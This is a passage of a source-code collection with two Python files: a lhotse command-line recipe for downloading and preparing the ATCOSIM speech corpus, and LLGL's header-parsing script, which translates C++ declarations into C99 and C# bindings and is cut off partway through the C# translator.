blob_id: cb5bda65dc44ef8df694fe82f55afa214f1240c7 | directory_id: 29eac50cc208d8aaebde699e8c851ed84b2de591 | path: /lhotse/bin/modes/recipes/atcosim.py | content_id: fdd1ac1274ee218c3690f4cee0dd454636d27b50
detected_licenses: ["Apache-2.0"] | license_type: permissive | repo_name: lhotse-speech/lhotse
snapshot_id: fcbbfbfd2e2bf95f9587268d605faa1d68df7790 | revision_id: 088f1802d5fa528f64ee32d1f79197e42fb8aae5 | branch_name: refs/heads/master
visit_date: 2023-09-01T12:58:57.383768 | revision_date: 2023-08-29T14:22:45 | committer_date: 2023-08-29T14:22:45
github_id: 258,529,948 | star_events_count: 667 | fork_events_count: 159 | gha_license_id: Apache-2.0 | gha_event_created_at: 2023-09-14T18:48:31 | gha_created_at: 2020-04-24T14:08:10 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,312 | extension: py | filename: atcosim.py
|
import click
from lhotse.bin.modes import download, prepare
from lhotse.recipes.atcosim import download_atcosim, prepare_atcosim
from lhotse.utils import Pathlike
__all__ = ["atcosim"]
@download.command(context_settings=dict(show_default=True))
@click.argument("target_dir", type=click.Path())
def atcosim(target_dir: Pathlike):
"""ATCOSIM download."""
download_atcosim(target_dir)
@prepare.command(context_settings=dict(show_default=True))
@click.argument("corpus_dir", type=click.Path(exists=True, dir_okay=True))
@click.argument("output_dir", type=click.Path())
@click.option("--silence-sym", type=str, default="")
@click.option("--breath-sym", type=str, default="")
@click.option("--foreign-sym", type=str, default="<unk>")
@click.option("--partial-sym", type=str, default="<unk>")
@click.option("--unknown-sym", type=str, default="<unk>")
def atcosim(
corpus_dir: Pathlike,
output_dir: Pathlike,
silence_sym: str,
breath_sym: str,
foreign_sym: str,
partial_sym: str,
unknown_sym: str,
):
"""ATCOSIM data preparation."""
prepare_atcosim(
corpus_dir,
output_dir=output_dir,
silence_sym=silence_sym,
breath_sym=breath_sym,
foreign_sym=foreign_sym,
partial_sym=partial_sym,
unknown_sym=unknown_sym,
)
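# Typical command-line usage of the two commands above, assuming the standard
# `lhotse` console entry point (paths are placeholders):
#     lhotse download atcosim /path/to/downloads
#     lhotse prepare atcosim /path/to/atcosim_corpus /path/to/manifests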
|
blob_id: b09fcbcd5d6ede1b9b81528a256d4c815d562e3a | directory_id: b969ef7c2e6dbc7ec223ee8a87054a9c2f736658 | path: /scripts/ParseLLGLHeader.py | content_id: 1ad210285c43312f4378af031e47075467b733f2
detected_licenses: ["BSD-3-Clause", "BSD-2-Clause"] | license_type: permissive | repo_name: LukasBanana/LLGL
snapshot_id: 186241fadbd0a3a77f3e008ca385950cce40273c | revision_id: 3d3b4d708704a6b430f9240003a09faa45f8e8b8 | branch_name: refs/heads/master
visit_date: 2023-08-23T10:29:33.190198 | revision_date: 2023-08-23T03:14:48 | committer_date: 2023-08-23T03:35:03
github_id: 62,965,106 | star_events_count: 1,848 | fork_events_count: 171 | gha_license_id: BSD-3-Clause | gha_event_created_at: 2023-08-28T22:36:19 | gha_created_at: 2016-07-09T19:10:46 | gha_language: C++
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 46,313 | extension: py | filename: ParseLLGLHeader.py
|
#
# ParseLLGLHeader.py
#
# Copyright (c) 2015 Lukas Hermanns. All rights reserved.
# Licensed under the terms of the BSD 3-Clause license (see LICENSE.txt).
#
import os
import sys
import re
from enum import Enum
def printHelp():
print("help:")
print(" parses LLGL headers and stores the meta data")
print("usage:")
print(" ParseLLGLHeader.py FILE+ [flags]")
print("flags:")
print(" -c99 ......... Translate header to C99")
print(" -csharp ...... Translate header to C#")
print(" -name=NAME ... Override name for consolidated headers")
print(" -fn .......... Also parse exported C function declarations")
def iterate(func, cont):
return list(map(func, cont))
def fatal(msg):
print(sys.argv[0] + ': ' + msg)
sys.exit(1)
class StdType(Enum):
UNDEFINED = 0
VOID = 1
BOOL = 2
CHAR = 3
INT8 = 4
INT16 = 5
INT32 = 6
INT64 = 7
UINT8 = 8
UINT16 = 9
UINT32 = 10
UINT64 = 11
LONG = 12
SIZE_T = 13
FLOAT = 14
ENUM = 15
FLAGS = 16
STRUCT = 17
CONST = 18 # static constexpr int
class ConditionalType:
name = ''
cond = None
include = None
def __init__(self, name, cond = None, include = None):
self.name = name
self.cond = cond
self.include = include
class LLGLMeta:
UTF8STRING = 'UTF8String'
STRING = 'string'
externals = [
ConditionalType('android_app', 'defined LLGL_OS_ANDROID', '<android_native_app_glue.h>')
]
builtins = {
'void': StdType.VOID,
'bool': StdType.BOOL,
'char': StdType.CHAR,
'int8_t': StdType.INT8,
'int16_t': StdType.INT16,
'short': StdType.INT16,
'int32_t': StdType.INT32,
'int': StdType.INT32,
'int64_t': StdType.INT64,
'uint8_t': StdType.UINT8,
'uint16_t': StdType.UINT16,
'uint32_t': StdType.UINT32,
'uint64_t': StdType.UINT64,
'long': StdType.LONG,
'size_t': StdType.SIZE_T,
'float': StdType.FLOAT,
'const': StdType.CONST
}
containers = [
'vector',
'ArrayView'
]
interfaces = [
'Buffer',
'BufferArray',
'Canvas',
'CommandBuffer',
'CommandQueue',
'Display',
'Fence',
'Image',
'PipelineLayout',
'PipelineState',
'QueryHeap',
'RenderPass',
'RenderSystem',
'RenderTarget',
'RenderingDebugger',
'RenderingProfiler',
'Report',
'Resource',
'ResourceHeap',
'Sampler',
'Shader',
'Surface',
'SwapChain',
'Texture',
'Window'
]
includes = {
'<LLGL-C/Types.h>'
}
copyright = [
'Copyright (c) 2015 Lukas Hermanns. All rights reserved.',
'Licensed under the terms of the BSD 3-Clause license (see LICENSE.txt).'
]
info = [
'AUTO GENERATED CODE - DO NOT EDIT'
]
funcPrefix = 'llgl'
typePrefix = 'LLGL'
class LLGLMacros:
def translateArraySize(ident):
if ident == 'LLGL_MAX_NUM_COLOR_ATTACHMENTS':
return 8
else:
return int(ident)
class LLGLType:
baseType = StdType.UNDEFINED
typename = '' # E.g. "Format" or "BufferDescriptor"
arraySize = 0 # 0 for non-array, -1 for dynamic array, anything else for fixed size array
isConst = False
isPointer = False
externalCond = None # Conditional expression string for external typenames (see LLGLMeta.externals)
DYNAMIC_ARRAY = -1
def __init__(self, typename = '', isConst = False, isPointer = False):
self.baseType = LLGLType.toBaseType(typename)
self.typename = typename
self.arraySize = 0
self.isConst = isConst
self.isPointer = isPointer
self.externalCond = next((external.cond for external in LLGLMeta.externals if external.name == typename), None)
def setArraySize(self, arraySize):
if isinstance(arraySize, str):
self.arraySize = LLGLMacros.translateArraySize(arraySize)
else:
self.arraySize = arraySize
def __str__(self):
str = self.typename
if self.arraySize > 0:
str += '[{}]'.format(self.arraySize)
elif self.arraySize == -1:
str += '[]'
if self.isPointer:
str += '*'
if self.isConst:
str += '+'
return str
def toBaseType(typename):
if typename != '':
builtin = LLGLMeta.builtins.get(typename)
return builtin if builtin else StdType.STRUCT
return StdType.UNDEFINED
# Returns true if this type is a custom LLGL enum, flags, or struct declaration
def isCustomType(self):
return self.baseType == StdType.STRUCT and not self.typename in ([LLGLMeta.UTF8STRING, LLGLMeta.STRING] + LLGLMeta.containers)
# Returns true if this type is an LLGL interface type such as PipelineState
def isInterface(self):
return self.baseType == StdType.STRUCT and self.typename in LLGLMeta.interfaces
def isDynamicArray(self):
return self.arraySize == LLGLType.DYNAMIC_ARRAY
def isPointerOrString(self):
return self.isPointer or self.typename in [LLGLMeta.UTF8STRING, LLGLMeta.STRING]
def getFixedBitsize(self):
if self.baseType in [StdType.INT8, StdType.UINT8]:
return 8
elif self.baseType in [StdType.INT16, StdType.UINT16]:
return 16
elif self.baseType in [StdType.INT32, StdType.UINT32]:
return 32
elif self.baseType in [StdType.INT64, StdType.UINT64]:
return 64
return 0
class LLGLField:
name = ''
type = LLGLType()
init = None
def __init__(self, name, type = LLGLType()):
self.name = name
self.type = type
self.init = None
def __str__(self):
str = ''
if self.type.baseType != StdType.UNDEFINED:
str += f'{self.name}:{self.type}'
else:
str += f'{self.name}'
if self.init:
str += f'({self.init})'
return str
class LLGLRecord:
name = ''
base = None
fields = []
deps = set() # Set of record names this record depends on
def __init__(self, name):
self.name = name
self.base = None
self.fields = []
self.deps = set()
def hasConstFieldsOnly(self):
for field in self.fields:
if field.type.baseType != StdType.CONST:
return False
return True
# Returns set of struct names that this record depends on
def deriveDependencies(self):
for field in self.fields:
if field.type.isCustomType() and not field.type.isInterface() and field.type.typename != self.name:
self.deps.add(field.type.typename)
class LLGLFunction:
returnType = LLGLType()
name = ''
params = [] # Array of LLGLField
def __init__(self, name, returnType = LLGLType()):
self.returnType = returnType
self.name = name
self.params = []
class LLGLModule:
name = ''
enums = [] # Array of LLGLRecord
flags = [] # Array of LLGLRecord
structs = [] # Array of LLGLRecord
funcs = [] # Array of LLGLFunction
typeDeps = set() # Set of types used in this header
def __init__(self):
self.name = ''
self.enums = []
self.flags = []
self.structs = []
self.funcs = []
self.typeDeps = set()
def deriveDependencies(self):
for struct in self.structs:
for field in struct.fields:
self.typeDeps.add(field.type)
def merge(self, other):
self.enums.extend(other.enums)
self.flags.extend(other.flags)
self.structs.extend(other.structs)
self.funcs.extend(other.funcs)
self.typeDeps.update(other.typeDeps)
def findStructByName(self, name):
for struct in self.structs:
if struct.name == name:
return struct
return None
def sortStructsByDependencies(self):
# Derive dependencies for all structs
for struct in self.structs:
struct.deriveDependencies()
# Start with structs that have no dependencies
knownTypenames = set(external.name for external in LLGLMeta.externals)
baseTypenames = set(enum.name for enum in self.enums) | set(flag.name for flag in self.flags) | knownTypenames
sortedStructs = []
pendingStructs = []
for struct in self.structs:
if len(struct.deps) == 0:
sortedStructs.append(struct)
else:
pendingStructs.append(struct)
# Continue with remaining structs
while len(pendingStructs) > 0:
wasAnyPendingStructSorted = False
pendingStructIndex = 0
declaredTypenames = set(struct.name for struct in sortedStructs) | baseTypenames
while pendingStructIndex < len(pendingStructs):
struct = pendingStructs[pendingStructIndex]
if struct.deps.issubset(declaredTypenames):
sortedStructs.append(struct)
pendingStructs.pop(pendingStructIndex)
wasAnyPendingStructSorted = True
else:
pendingStructIndex += 1
if not wasAnyPendingStructSorted:
def printCyclicDependencies(struct, typenames):
print(f"Cyclic dependency in struct '{struct.name}':")
for dep in struct.deps:
if not dep in typenames:
print(f" ==> Missing '{dep}'")
printCyclicDependencies(pendingStructs[0], declaredTypenames)
fatal('error: failed to resolve dependencies')
return sortedStructs
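# Example of why the ordering above matters for the generated C99 header: if a
# struct embeds another struct by value (illustrative names), the dependency
# must be emitted first, e.g.
#     typedef struct LLGLExtent2D { /* ... */ } LLGLExtent2D;
#     typedef struct LLGLTextureDescriptor { LLGLExtent2D extent; /* ... */ } LLGLTextureDescriptor;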
def scanTokens(filename):
def preprocessSource(text):
def removeRange(text, start, end):
pos = 0
while True:
pos = text.find(start, pos)
if pos >= 0:
posEnd = text.find(end, pos + len(start))
if posEnd >= pos:
blanks = ' ' * (posEnd + len(end) - pos)
text = text[:pos] + blanks + text[posEnd if end == '\n' else posEnd + len(end):]
else:
pos += 1
else:
break
return text
# Remove comments and preprocessor directives
text = removeRange(text, '#', '\n')
text = removeRange(text, '//', '\n') #TMP
text = removeRange(text, '/*', '*/') #TMP
# Replace multi-line comments with single line comments
def convertComments(text, start, end, filler):
assert len(filler) == len(start)
assert len(filler) == len(end)
pos = 0
while True:
pos = text.find(start, pos)
if pos >= 0:
posEnd = text.find(end, pos + len(start))
if posEnd >= pos:
text = text[:pos] + filler + text[pos + len(start):]
while True:
lineEnd = text.find('\n', pos + len(start))
if lineEnd >= pos and lineEnd < posEnd:
text = text[:lineEnd] + filler + text[lineEnd:]
pos = lineEnd
else:
text = text[:posEnd] + filler + text[posEnd + len(end):]
pos = posEnd
break
else:
pos += 1
else:
break
return text
#text = convertComments(text, '/*', '*/', '//')
return text
# Scan tokens from source file
try:
with open(filename, 'r') as file:
text = preprocessSource(file.read())
#print(text) # ~~~~~~~~~~~~ TEST ~~~~~~~~~~~~
#sys.exit(0)
#text = file.read()
return re.findall(r'//[^\n]*|[a-zA-Z_]\w*|\d+\.\d+[fF]|\d+[uU]|\d+|[{}\[\]]|::|:|<<|>>|[+-=,;<>\|]|[*]|[(]|[)]', text)
except UnicodeDecodeError:
fatal('UnicodeDecodeError exception while reading file: ' + filename)
return None
def reduceTokens(tokens):
reduced = []
tok = 0
while tok < len(tokens):
if tokens[tok] in ['std', 'LLGL'] and tok + 1 < len(tokens) and tokens[tok + 1] == '::':
tok += 2 # Ignore std:: and LLGL:: namespace resolutions
elif tokens[tok] in ['inline']:
tok += 1 # Ignore keywords: inline
else:
reduced.append(tokens[tok])
tok += 1
return reduced
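# Illustrative effect of the two passes above: the C++ line
#     std::uint32_t numSamples = 1;
# is scanned into ['std', '::', 'uint32_t', 'numSamples', '=', '1', ';'] and
# reduced to ['uint32_t', 'numSamples', '=', '1', ';'] once the 'std::'
# namespace resolution is dropped.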
class Scanner:
filename = ''
tokens = []
readPos = 0
def __init__(self):
self.filename = ''
self.tokens = []
self.readPos = 0
def good(self):
return self.readPos < len(self.tokens)
def scan(self, filename):
self.filename = filename
self.tokens = reduceTokens(scanTokens(filename))
#iterate(print, self.tokens) # ~~~~~~~~~~~~ TEST ~~~~~~~~~~~~
#sys.exit(0)
def tok(self, lookAhead = 0):
return self.tokens[self.readPos + lookAhead] if self.readPos + lookAhead < len(self.tokens) else ''
def accept(self, count = 1):
tok = self.tok()
self.readPos += count
return tok
def match(self, filter, equality=True):
if (self.tok() == filter) == equality:
return 1
elif hasattr(filter, '__len__'):
filterIndex = 0
while filterIndex < len(filter):
if not ((self.tok(filterIndex) == filter[filterIndex]) == equality):
return 0
filterIndex += 1
return filterIndex
return 0
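# Example: with the upcoming tokens ['static', 'constexpr', 'int', ...],
# match('static') returns 1, match(['static', 'constexpr', 'int']) returns 3
# (the length of the matched sequence), and match('struct') returns 0.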
def acceptIf(self, filter):
count = self.match(filter)
if count > 0:
self.accept(count)
return True
return False
def acceptIfNot(self, match):
count = self.match(match, equality=False)
if count > 0:
self.accept(count)
return True
return False
def acceptOrFail(self, match):
if not self.acceptIf(match):
fatal(f"{self.filename}: error: expected token '{match}', but got '{self.tok()}'; predecessors: {self.tokens[self.readPos - 5:self.readPos]}")
def ignoreUntil(self, filter):
while self.good():
if self.acceptIf(filter):
break
self.accept()
class Parser:
scanner = None
def __init__(self):
self.scanner = Scanner()
def parseInitializer(self):
value = ''
if self.scanner.acceptIf('{'):
value += '{'
while not self.scanner.match('}'):
value += self.parseInitializer()
if self.scanner.match(','):
value += self.scanner.accept()
else:
break
self.scanner.acceptOrFail('}')
value += '}'
else:
while not self.scanner.tok() in [',', ';', '}']:
value += self.scanner.accept()
return value
def parseEnumEntries(self):
entries = []
while self.scanner.tok() != '}':
entry = LLGLField(self.scanner.accept())
if self.scanner.acceptIf('='):
entry.init = self.parseInitializer()
entries.append(entry)
if not self.scanner.acceptIf(','):
break
return entries
def parseType(self):
if self.scanner.acceptIf(['static', 'constexpr', 'int']):
return LLGLType('const')
else:
isConst = self.scanner.acceptIf('const')
typename = self.scanner.accept()
isConst = self.scanner.acceptIf('const') or isConst
if typename in LLGLMeta.containers and self.scanner.acceptIf('<'):
isConst = self.scanner.acceptIf('const') or isConst
typename = self.scanner.accept()
isPointer = self.scanner.acceptIf('*')
self.scanner.acceptOrFail('>')
type = LLGLType(typename, isConst, isPointer)
type.setArraySize(LLGLType.DYNAMIC_ARRAY)
return type
else:
isPointer = self.scanner.acceptIf('*')
type = LLGLType(typename, isConst, isPointer)
return type
def parseStructMembers(self, structName):
members = []
while self.scanner.tok() != '}':
type = self.parseType()
isCtor = type.typename == structName
isOper = self.scanner.tok() == 'operator'
isFunc = self.scanner.tok(1) == '('
if isCtor or isOper or isFunc:
# Ignore operators
if isOper:
self.scanner.accept(2)
elif isFunc:
self.scanner.accept()
# Ignore constructors and member functions
self.scanner.acceptOrFail('(')
self.scanner.ignoreUntil(')')
if self.scanner.acceptIf(':'):
# Ignore initializer list
while self.scanner.good():
self.scanner.accept() # Member
self.scanner.acceptOrFail('{')
self.scanner.ignoreUntil('}')
if not self.scanner.acceptIf(','):
break
# Ignore c'tor body
self.scanner.acceptOrFail('{')
self.scanner.ignoreUntil('}')
else:
# Ignore tokens until end of declaration ';', e.g. 'Ctor();' or 'Ctor() = default;'
self.scanner.ignoreUntil(';')
else:
member = LLGLField(self.scanner.accept())
member.type = type
if self.scanner.acceptIf('['):
member.type.setArraySize(self.scanner.accept())
self.scanner.acceptOrFail(']')
if self.scanner.acceptIf('='):
member.init = self.parseInitializer()
members.append(member)
self.scanner.acceptOrFail(';')
return members
def parseParameter(self):
# Only parse the type and parameter name, since C does not support default arguments
paramType = self.parseType()
param = LLGLField(self.scanner.accept(), paramType)
# Parse optional fixed size array
if self.scanner.acceptIf('['):
param.type.setArraySize(self.scanner.accept())
self.scanner.acceptOrFail(']')
self.scanner.acceptIf('LLGL_NULLABLE')
return param
def parseFunctionDecl(self):
# Parse return type
returnType = self.parseType()
# Parse function name
name = self.scanner.accept()
# Parse parameter list
func = LLGLFunction(name, returnType)
self.scanner.acceptOrFail('(')
if not self.scanner.match(')'):
if self.scanner.match(['void', ')']):
# Ignore explicit empty parameter list
self.scanner.accept()
else:
# Parse parameters until no more ',' is scanned
while True:
func.params.append(self.parseParameter())
if not self.scanner.acceptIf(','):
break
self.scanner.acceptOrFail(')')
self.scanner.acceptOrFail(';')
return func
# Parses input file by filename and returns LLGLModule
def parseHeader(self, filename, processFunctions = False):
mod = LLGLModule()
mod.name = os.path.splitext(os.path.basename(filename))[0]
self.scanner.scan(filename)
while self.scanner.good():
if processFunctions and self.scanner.acceptIf('LLGL_C_EXPORT'):
# Parse function declaration
mod.funcs.append(self.parseFunctionDecl())
elif self.scanner.acceptIf(['enum', 'class']):
# Parse enumeration
name = self.scanner.accept()
enum = LLGLRecord(name)
if self.scanner.acceptIf(':'):
enum.base = self.parseType()
self.scanner.acceptOrFail('{')
enum.fields = self.parseEnumEntries()
self.scanner.acceptOrFail('}')
mod.enums.append(enum)
elif self.scanner.acceptIf('struct'):
self.scanner.acceptIf('LLGL_EXPORT')
name = self.scanner.accept()
self.scanner.acceptOrFail('{')
if self.scanner.acceptIf('enum'):
# Parse flags
flag = LLGLRecord(name)
if self.scanner.acceptIf(':'):
flag.base = self.parseType()
self.scanner.acceptOrFail('{')
flag.fields = self.parseEnumEntries()
mod.flags.append(flag)
else:
# Parse structure
struct = LLGLRecord(name)
struct.fields = self.parseStructMembers(name)
mod.structs.append(struct)
self.scanner.acceptOrFail('}')
else:
self.scanner.accept()
return mod
def parseFile(filename, processFunctions = False):
parser = Parser()
mod = parser.parseHeader(filename, processFunctions)
mod.deriveDependencies()
return mod
def printModule(module):
def printField(field, type):
print('@' + type + '{' + str(field) + '}')
def printRecord(record, type):
print('@' + type + '{' + record.name + '}')
iterate(lambda field: printField(field, 'FIELD'), record.fields)
print('@END')
def printFunc(func, type):
print('@' + type + '{' + func.name + '}=>' + str(func.returnType))
iterate(lambda param: printField(param, 'PARAM'), func.params)
print('@END')
print('@HEADER{' + module.name + '}')
iterate(lambda record: printRecord(record, 'CONST'), filter(lambda record: record.hasConstFieldsOnly(), module.structs))
iterate(lambda record: printRecord(record, 'ENUM'), module.enums)
iterate(lambda record: printRecord(record, 'FLAG'), module.flags)
iterate(lambda record: printRecord(record, 'STRUCT'), filter(lambda record: not record.hasConstFieldsOnly(), module.structs))
iterate(lambda func: printFunc(func, 'FUNC'), module.funcs)
print('@END')
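# Illustrative use of the entry points above (the header path is hypothetical):
#     mod = parseFile('include/LLGL-C/FormatFlags.h')
#     printModule(mod)
# which prints the @HEADER/@ENUM/@FLAG/@STRUCT meta description for that header.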
class Translator:
indent = 0
tabSize = 4
class Declaration:
type = ''
name = ''
init = None
directive = None
def __init__(self, type = '', name = '', init = None, directive = None):
self.type = type
self.name = name
self.init = init
self.directive = directive
class DeclarationList:
decls = []
maxLen = [0, 0, 0]
def __init__(self):
self.decls = []
self.maxLen = [0, 0, 0]
def append(self, decl):
self.decls.append(decl)
if not decl.directive:
self.maxLen[0] = max(self.maxLen[0], len(decl.type) if decl.type else 0)
self.maxLen[1] = max(self.maxLen[1], len(decl.name))
self.maxLen[2] = max(self.maxLen[2], len(decl.init) if decl.init else 0)
def spaces(self, index, str):
return ' ' * (self.maxLen[index] - len(str) + 1)
def indentation(self):
return ' ' * (self.indent * self.tabSize)
def statement(self, line):
if len(line) > 0 and line[0] == '#':
print(line)
else:
print(self.indentation() + line)
def openScope(self, stmt = '{'):
self.statement(stmt)
self.indent += 1
def closeScope(self, stmt = '}'):
self.indent -= 1
self.statement(stmt)
def convertNameToHeaderGuard(name):
return re.sub(r'([A-Z]+)', r'_\1', name).upper()
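# Example: convertNameToHeaderGuard('CommandBufferFlags') yields
# '_COMMAND_BUFFER_FLAGS', which translateModuleToC99 below turns into the
# include guard 'LLGL_C99_COMMAND_BUFFER_FLAGS_H'.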
def translateModuleToC99(self, doc):
def translateDependency(type):
if type.baseType in [StdType.BOOL]:
return '<stdbool.h>', True
elif type.baseType in [StdType.INT8, StdType.INT16, StdType.INT32, StdType.INT64, StdType.UINT8, StdType.UINT16, StdType.UINT32, StdType.UINT64]:
return '<stdint.h>', True
elif type.baseType in [StdType.SIZE_T]:
return '<stddef.h>', True
elif type.baseType in [StdType.CHAR, StdType.LONG, StdType.FLOAT]:
return None, True
return f'<LLGL-C/{type.typename}Flags.h>', False
def translateIncludes(typeDeps):
stdIncludes = set()
llglIncludes = LLGLMeta.includes.copy()
for dep in typeDeps:
inc = translateDependency(dep)
if inc and inc[0]:
if inc[1]:
stdIncludes.add(inc[0])
#else:
# llglIncludes.add(inc[0])
return stdIncludes, llglIncludes
self.statement('/*')
self.statement(' * {}.h'.format(doc.name))
self.statement(' *')
for line in LLGLMeta.copyright:
self.statement(' * ' + line)
self.statement(' */')
self.statement('')
for line in LLGLMeta.info:
self.statement('/* {} */'.format(line))
self.statement('')
# Write header guard
headerGuardName = 'LLGL_C99{}_H'.format(Translator.convertNameToHeaderGuard(doc.name))
self.statement('#ifndef ' + headerGuardName)
self.statement('#define ' + headerGuardName)
self.statement('')
self.statement('')
# Write all include directives
includeHeaders = translateIncludes(doc.typeDeps)
if len(includeHeaders[0]) > 0 or len(includeHeaders[1]) > 0:
for i in range(0, len(includeHeaders)):
for inc in includeHeaders[i]:
self.statement('#include {}'.format(inc))
for external in LLGLMeta.externals:
if external.cond and external.include:
self.statement('')
self.statement(f'#if {external.cond}')
self.statement(f'# include {external.include}')
self.statement(f'#endif /* {external.cond} */')
self.statement('')
self.statement('')
# Write all constants
constStructs = list(filter(lambda record: record.hasConstFieldsOnly(), doc.structs))
if len(constStructs) > 0:
self.statement('/* ----- Constants ----- */')
self.statement('')
for struct in constStructs:
# Write struct field declarations
declList = Translator.DeclarationList()
for field in struct.fields:
declList.append(Translator.Declaration('', 'LLGL_{}_{}'.format(struct.name.upper(), field.name.upper()), field.init))
for decl in declList.decls:
self.statement('#define ' + decl.name + declList.spaces(1, decl.name) + ' ( ' + decl.init + ' )')
self.statement('')
self.statement('')
# Write all enumerations
sizedTypes = dict()
if len(doc.enums) > 0:
self.statement('/* ----- Enumerations ----- */')
self.statement('')
for enum in doc.enums:
if enum.base:
bitsize = enum.base.getFixedBitsize()
if bitsize > 0:
sizedTypes[enum.name] = bitsize
self.statement('typedef enum LLGL{}'.format(enum.name))
self.openScope()
# Write enumeration entry declarations
declList = Translator.DeclarationList()
for field in enum.fields:
declList.append(Translator.Declaration('', 'LLGL{}{}'.format(enum.name, field.name), field.init))
for decl in declList.decls:
if decl.init:
self.statement(decl.name + declList.spaces(1, decl.name) + '= ' + decl.init + ',')
else:
self.statement(decl.name + ',')
self.closeScope()
self.statement('LLGL{};'.format(enum.name))
self.statement('')
self.statement('')
# Write all flags
if len(doc.flags) > 0:
def translateFlagInitializer(basename, init):
str = init
str = re.sub(r'([a-zA-Z_]\w*)', 'LLGL{}{}'.format(basename, r'\1'), str)
str = re.sub(r'(\||<<|>>|\+|\-|\*|\/)', r' \1 ', str)
return str
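# Illustrative rewrites performed by translateFlagInitializer for a flags record
# named 'CPUAccessFlags' (basename 'CPUAccess'):
#     '(Read|Write)' -> '(LLGLCPUAccessRead | LLGLCPUAccessWrite)'
#     '(1<<0)'       -> '(1 << 0)'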
def translateFieldName(name):
exceptions = [
('LLGLCPUAccessReadWrite', None) # Identifier for LLGL::CPUAccessFlags::ReadWrite is already used for LLGL::CPUAccess::ReadWrite
]
for exception in exceptions:
if name == exception[0]:
return exception[1]
return name
self.statement('/* ----- Flags ----- */')
self.statement('')
for flag in doc.flags:
self.statement('typedef enum LLGL{}'.format(flag.name))
basename = flag.name[:-len('Flags')]
self.openScope()
# Write flag entry declarations
declList = Translator.DeclarationList()
for field in flag.fields:
fieldName = translateFieldName(f'LLGL{basename}{field.name}')
if fieldName:
declList.append(Translator.Declaration('', fieldName, translateFlagInitializer(basename, field.init) if field.init else None))
for decl in declList.decls:
if decl.init:
self.statement(decl.name + declList.spaces(1, decl.name) + '= ' + decl.init + ',')
else:
self.statement(decl.name + ',')
self.closeScope()
self.statement('LLGL{};'.format(flag.name))
self.statement('')
self.statement('')
# Write all structures
commonStructs = list(filter(lambda record: not record.hasConstFieldsOnly(), doc.structs))
if len(commonStructs) > 0:
def translateStructField(type, name):
nonlocal sizedTypes
typeStr = ''
declStr = ''
# Write type specifier
if type.isDynamicArray() and not type.isPointerOrString():
typeStr += 'const '
if type.typename in [LLGLMeta.UTF8STRING, LLGLMeta.STRING]:
typeStr += 'const char*'
elif type.baseType == StdType.STRUCT and type.typename in LLGLMeta.interfaces:
typeStr += 'LLGL' + type.typename
else:
if type.isConst:
typeStr += 'const '
if type.baseType == StdType.STRUCT and not type.externalCond:
typeStr += 'LLGL'
typeStr += type.typename
if type.isPointer:
typeStr += '*'
if type.isDynamicArray():
typeStr += ' const*' if type.isPointerOrString() else '*'
# Write field name
declStr += name
# Write optional bit size for enumerations with underlying type (C does not support explicit underlying enum types)
bitsize = sizedTypes.get(type.typename)
if bitsize:
declStr += f' : {bitsize}'
# Write fixed size array dimension
if type.arraySize > 0:
declStr += f'[{type.arraySize}]'
return (typeStr, declStr)
def translateFieldInitializer(type, init):
if type.isDynamicArray():
return 'NULL'
if init:
if init == 'nullptr':
return 'LLGL_NULL_OBJECT' if type.isInterface() else 'NULL'
else:
return re.sub(r'(\w+::)', r'LLGL\1', init).replace('::', '').replace('|', ' | ').replace('Flags', '')
return None
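# Illustrative effect of the two helpers above: a C++ member declared as
#     ArrayView<AttachmentDescriptor> colorAttachments;
# (names are illustrative) is emitted in the C99 struct as a pair of fields:
#     size_t numColorAttachments;                        /* = 0 */
#     const LLGLAttachmentDescriptor* colorAttachments;  /* = NULL */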
self.statement('/* ----- Structures ----- */')
self.statement('')
for struct in commonStructs:
self.statement('typedef struct LLGL{}'.format(struct.name))
self.openScope()
# Write struct field declarations
declList = Translator.DeclarationList()
for field in struct.fields:
# Write two fields for dynamic arrays
externalCond = field.type.externalCond
if externalCond:
declList.append(Translator.Declaration(directive = f'#if {externalCond}'))
if field.type.isDynamicArray():
declList.append(Translator.Declaration('size_t', f'num{field.name[0].upper()}{field.name[1:]}', '0'))
declStr = translateStructField(field.type, field.name)
declList.append(Translator.Declaration(declStr[0], declStr[1], translateFieldInitializer(field.type, field.init)))
if externalCond:
declList.append(Translator.Declaration(directive = f'#endif /* {externalCond} */'))
for decl in declList.decls:
if decl.directive:
self.statement(decl.directive)
elif decl.init:
self.statement(f'{decl.type}{declList.spaces(0, decl.type)}{decl.name};{declList.spaces(1, decl.name)}/* = {decl.init} */')
else:
self.statement(f'{decl.type}{declList.spaces(0, decl.type)}{decl.name};')
self.closeScope()
self.statement('LLGL{};'.format(struct.name))
self.statement('')
self.statement('')
self.statement('#endif /* {} */'.format(headerGuardName))
self.statement('')
self.statement('')
self.statement('')
self.statement('/* ================================================================================ */')
self.statement('')
def translateModuleToCsharp(self, doc):
builtinTypenames = {
StdType.VOID: 'void',
StdType.BOOL: 'bool',
StdType.CHAR: 'byte',
StdType.INT8: 'sbyte',
StdType.INT16: 'short',
StdType.INT32: 'int',
StdType.INT64: 'long',
StdType.UINT8: 'byte',
StdType.UINT16: 'ushort',
StdType.UINT32: 'uint',
StdType.UINT64: 'ulong',
StdType.LONG: 'long',
StdType.SIZE_T: 'UIntPtr',
StdType.FLOAT: 'float'
}
self.statement('/*')
self.statement(' * {}.cs'.format(doc.name))
self.statement(' *')
for line in LLGLMeta.copyright:
self.statement(' * ' + line)
self.statement(' */')
self.statement('')
for line in LLGLMeta.info:
self.statement('/* {} */'.format(line))
self.statement('')
self.statement('using System;')
self.statement('using System.Runtime.InteropServices;')
self.statement('')
self.statement('namespace LLGLModule')
self.openScope()
self.statement('public static partial class LLGL')
self.openScope()
# Write DLL name
self.statement('#if DEBUG')
self.statement('const string DllName = "LLGLD.dll";')
self.statement('#else')
self.statement('const string DllName = "LLGL.dll";')
self.statement('#endif')
self.statement('')
# Write all constants
constStructs = list(filter(lambda record: record.hasConstFieldsOnly(), doc.structs))
if len(constStructs) > 0:
self.statement('/* ----- Constants ----- */')
self.statement('')
for struct in constStructs:
self.statement('public enum {} : int'.format(struct.name))
self.openScope()
# Write struct field declarations
declList = Translator.DeclarationList()
for field in struct.fields:
declList.append(Translator.Declaration('', field.name, field.init))
for decl in declList.decls:
self.statement(decl.name + declList.spaces(1, decl.name) + ' = ' + decl.init + ',')
self.closeScope()
self.statement('')
self.statement('')
# Write all interface handles
self.statement('/* ----- Handles ----- */')
self.statement('')
for interface in LLGLMeta.interfaces:
self.statement(f'public unsafe struct {interface}')
self.openScope()
self.statement('internal unsafe void* ptr;')
